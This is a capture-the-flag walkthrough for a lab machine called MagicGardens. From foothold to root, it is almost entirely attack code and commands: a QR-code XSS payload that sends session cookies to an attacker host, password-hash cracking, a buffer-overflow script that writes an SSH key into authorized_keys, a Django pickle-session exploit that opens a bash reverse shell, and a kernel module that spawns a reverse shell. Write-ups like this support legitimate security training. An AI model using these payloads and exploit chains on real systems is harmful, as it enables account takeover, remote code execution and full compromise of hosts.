Explore the fundamentals of cybersecurity in the MagicGardens Capture The Flag (CTF) challenge, a insane-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts#

10.10.11.9 magicgardens.htb

Script to add hosts automatically#

ip="10.10.11.9"
domain="magicgardens.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping#

nmap -sCV magicgardens.htb

Nmap scan report for magicgardens.htb (10.10.11.9)
Host is up (0.063s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e0:72:62:48:99:33:4f:fc:59:f8:6c:05:59:db:a7:7b (ECDSA)
|_  256 62:c6:35:7e:82:3e:b1:0f:9b:6f:5b:ea:fe:c5:85:9a (ED25519)
25/tcp   filtered smtp
80/tcp   open     http     nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Magic Gardens
5000/tcp open     ssl/http Docker Registry (API: 2.0)
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2023-05-23T11:57:43
|_Not valid after:  2024-05-22T11:57:43
|_http-title: Site doesn't have a title.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Foothold via XSS#

  1. Go to http://magicgardens.htb and register.
  2. Navigate to http://magicgardens.htb/profile/?tab=subscription, click “Upgrade”, and select honestbank.htb.
  3. Capture the request, modify the “Bank” parameter to your local IP (YOUR_IP):8000, and start a local server:
python -m http.server 8000
  1. Test the original server’s response:
curl http://honestbank.htb/api/payments/
  1. Simulate a POST request:
curl http://honestbank.htb/api/payments/ -X POST -d '{"cardname":"sun", "cardnumber":"12345678901"}'
  1. Close the server and run a Flask server:
from flask import Flask, jsonify, request
app = Flask(__name__)

@app.route('/api/payments/', methods=['POST'])
def handle_payment():
    req_json = request.get_json()
    req_json['status'] = "200"
    print(req_json)
    return jsonify(req_json)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8000)

  1. Intercept the request, set bank=YOUR_IP:8000, and forward requests with Burp. Disable intercept refresh the page and buy a flower with the vip subscription.

  2. Extract and scan the QR code using zbar tools like qrscan.

QR content:

2b4d11f6d8220941e1726e89547ef8a0.0d341bcdc6746f1d452b3f4de32357b9.pwn@pwn.com
  1. Replace vpn-ip and QR ID in the payload and generate a malicious QR code:

Server to retrive the coockies:

python -m http.server 8000

import qrcode

data = '''2b4d11f6d8220941e1726e89547ef8a0.0d341bcdc6746f1d452b3f4de32357b9.</p><script>var i=new Image(); i.src="http://vpn-ip:8000/?cookie="+btoa(document.cookie);</script><p>'''
qr = qrcode.QRCode(box_size=10, border=4)
qr.add_data(data)
qr.make(fit=True)
img = qr.make_image(fill='black', back_color='white')
img.save("evilqr.png")
  1. Send the malicious QR code in response to the message received from Morty after buying a flower. Once you get the response, decode the Base64-encoded cookie:
echo -n "Base64 of the Cookies? "; read payload
echo $payload | base64 -d
  1. Use the cookie sessionid in your browser and access:
http://magicgardens.htb/admin/store/storeuser/morty/change/

You will find the hash pbkdf2_sha256$600000$y7K056G3KxbaRc40ioQE8j$e7bq8dE/U+yIiZ8isA0Dc0wuL0gYI3GjmmdzNU+Nl7I=.

Brute Force the Hash#

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat 10000 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt

You will find the credentials for jonasbrothers.

To SSH into the target as Morty, use the following command:

ssh morty@magicgardens.htb

Discovering Harvest Buffer Overflow#

Target Machine:

  • Start HTTP server on port 8008:
cd /
python3 -m http.server 8008

Local Machine:

  • Download and prepare harvest binary:
wget http://magicgardens.htb:8008/usr/local/bin/harvest
chmod +x ./harvest
sudo ./harvest server

Testing and Exploitation:#

  1. Initial Testing:

    • Send test payload:
      echo "test" | nc 127.0.0.1 1337
    • Expected result: [x] Handshake error
    • Send correct version:
      echo "harvest v1.0.3" | nc 127.0.0.1 1337
    • This indicates a successful handshake.

  2. Reversing and Exploitation:

    • Vulnerability observed in strcmp function not limiting buffer size.
    • Monitor file operations:
      strace -t -e trace=openat ./harvest server -l save.txt
    • Buffer Overflow Attack Script:
      import socket

server_address = ('::1', 6666)
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(server_address)
data = b'A'*65500
s.send(data)
    • Generate and use a pattern to accurately target memory:
      python -c "from pwn import *; open('bof.txt','w').write(cyclic(65500).decode())"
    • Use the generated pattern:
      import socket

server_address = ('::1', 6666)
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(server_address)
with open('bof.txt', 'rb') as f:
    data = bytearray(f.read())
s.send(data[:65372] + b"/tmp/name.txt")
s.close()
    • Check for successful exploit:
      cat /tmp/name.txt
    • Find the pattern offset:
      python -c "from pwn import *; print(cyclic_find(b'daaa'))"
    • The offset identified (12) is crucial for crafting an effective exploit.

From Morty to Alex: Buffer Overflow in Harvest v1.0.3#

Generate the SSH key on your local machine

ssh-keygen -f ./key

This will generate a key pair and save it as ./key (private key) and ./key.pub (public key).

Display the public key on your local machine

cat ./key.pub

Send a message to the vulnerable service on the target

echo "harvest v1.0.3" > /dev/tcp/127.0.0.1/1337

Open a Python REPL on the target

python3

Paste the following code into the Python REPL and adjust the SSH Public key (key) as needed:

import socket

server_address = ('::1', 6666)
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(server_address)
data = bytearray(b'\n' * 65403)
key = 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEICRuVTVFybA8QCIqNV+IU2oYS8kDu9W/ASXOkwHUxw e@Arch'
replace = b"/home/alex/.ssh/authorized_keys"
sendData = data[:65372] + replace
sendData[12:12 + len(key)] = key.encode()
s.send(sendData)

SSH into the target using the generated private key

ssh -i ./key alex@magicgardens.htb

Once connected, read the contents of the files

cat /home/alex/user.txt
cat /var/mail/alex

We get

UEsDBAoACQAAAG6osFh0pjiyVAAAAEgAAAAIABwAaHRwYXNzd2RVVAkAA29KRmbOSkZmdXgLAAEE6AMAAAToAwAAVb+x1HWvt0ZpJDnunJUUZcvJr8530ikv39GM1hxULcFJfTLLNXgEW2TdUU3uZ44Sq4L6Zcc7HmUA041ijjidMG9iSe0M/y1tf2zjMVg6Dbc1ASfJUEsHCHSmOLJUAAAASAAAAFBLAQIeAwoACQAAAG6osFh0pjiyVAAAAEgAAAAIABgAAAAAAAEAAACkgQAAAABodHBhc3N3ZFVUBQADb0pGZnV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAQABAE4AAACmAAAAAAA=

Unzip the zip#

On Your Local Machine

Make sure everything is on one line or it will not work with the read command

echo -en "Zip Content? "; read zip
echo $zip | base64 -d > auth.zip
zip2john auth.zip > auth.hash
john --wordlist=/usr/share/dict/rockyou.txt auth.hash
john auth.hash --show

Unzip and Read the Contents:

unzip auth.zip
cat htpasswd

Brute Force the Hash#

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt

https://github.com/Syzik/DockerRegistryGrabber

git clone https://github.com/Syzik/DockerRegistryGrabber
cd DockerRegistryGrabber
python drg.py https://magicgardens.htb -U AlexMiles -P diamonds --dump magicgardens.htb

It will take a while; once finished, proceed to extract all registers.

cd magicgardens.htb
for file in $(zgrep -la morty *.tar.gz); do
  tar -xzf "$file"
done
cat ./usr/src/app/.env

Save this script in your local machine as exploit.py. It generates a malicious session to execute a reverse shell.

import requests
from django.contrib.sessions.serializers import PickleSerializer
from django.core import signing
from django.conf import settings
import base64
import subprocess
import os

settings.configure(SECRET_KEY="55A6cc8e2b8#ae1662c34)618U549601$7eC3f0@b1e8c2577J22a8f6edcb5c9b80X8f4&87b")

def get_tun0_ip():
    return subprocess.check_output("ip a | grep -A 2 'tun0:' | grep -oP '(?<=inet\\s)\\d+(\\.\\d+){3}'", shell=True).decode().strip()

def generate_reverse_shell(ip, port=9001):
    return base64.b64encode(f"/bin/bash -c '/bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1'".encode()).decode()

class CreateTmpFile(object):
    def __reduce__(self):
        return (subprocess.call, (['bash', '-c', f'echo {generate_reverse_shell(get_tun0_ip())} | base64 -d | bash'],))

def create_malicious_session():
    return signing.dumps(obj=CreateTmpFile(), serializer=PickleSerializer, salt='django.contrib.sessions.backends.signed_cookies')

def set_session_cookie(session_id):
    requests.get("http://magicgardens.htb/admin/login/?next=/admin/", cookies={'sessionid': session_id})

def curl_with_session_cookie(session_id):
    os.system(f"curl -b 'sessionid={session_id}' http://magicgardens.htb/admin/login/?next=/admin/")

if __name__ == "__main__":
    session_cookie = create_malicious_session()
    set_session_cookie(session_cookie)
    curl_with_session_cookie(session_cookie)

Note: The exploits require the Django package (pip install django==3.2) to work. The latest version (5.1.2) does not include django.contrib.sessions.serializers.

  1. Make sure you have a listener ready:
nc -lvnp 9001
  1. Run the Python exploit:
python exploit.py

Your listener is now connected to the Docker container inside the target.

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

export TERM=xterm;

Privilege Escalation Using Linux Capabilities#

Check Current Linux Capabilities#

You can check your current capabilities using capsh. Here’s an example output:

capsh --print

Example Output:#

Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_audit_write,cap_setfcap=ep
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_audit_write,cap_setfcap
Ambient set =
Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_mknod,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore
Securebits: 00/0x0/1'b0 (no-new-privs=0)
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: HYBRID (4)

You can learn more about Linux capabilities and their privilege escalation potential here.

Kernel Module: Reverse Shell#

The following reverse-shell.c code is an example of a loadable kernel module (LKM) that spawns a reverse shell:

Code: reverse-shell.c#

#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

// Replace "vpn-ip" with your actual IP address.
char* argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/vpn-ip/4444 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL};

static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

Makefile#

Below is the corresponding Makefile for compiling the kernel module:

obj-m += reverse-shell.o
all:
  make -C /lib/modules/$(shell uname -r)/build M=$(pwd) modules
clean:
  make -C /lib/modules/$(shell uname -r)/build M=$(pwd) clean

All in one command#

Local (Listener):

nc -lp 12345 > reverse-shell.ko

Ssh (Compile, Send File):

ssh -i ./key alex@magicgardens.htb

cd /tmp
cat << EOF > reverse-shell.c
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

// Replace "vpn-ip" with your actual IP address.
char* argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/vpn-ip/4444 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL};

static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
EOF
echo -e "obj-m += reverse-shell.o\nall:\n\tmake -C /lib/modules/6.1.0-20-amd64/build M=\$(PWD) modules\nclean:\n\tmake -C /lib/modules/6.1.0-20-amd64/build M=\$(PWD) clean" > Makefile
make
cat reverse-shell.ko > /dev/tcp/<vpnip>/12345

Local:

  1. Start a Python HTTP Server: Host the reverse-shell.ko file so it can be downloaded by the container:

    python3 -m http.server 8000

  2. Set Up a Netcat Listener: Open another terminal and start a listener to catch the reverse shell:

    nc -lvnp 4444

Target Container:

  1. Download the Kernel Module: Use wget to fetch the reverse-shell.ko file from your local machine:
wget http://<your-local-ip>:8000/reverse-shell.ko
  1. Load the Kernel Module: Insert the module to trigger the reverse shell:
insmod reverse-shell.ko
  1. Access the root flag: Once the reverse shell is established, you can execute commands on the target machine. For example, retrieve the root flag:
cat /root/root.txt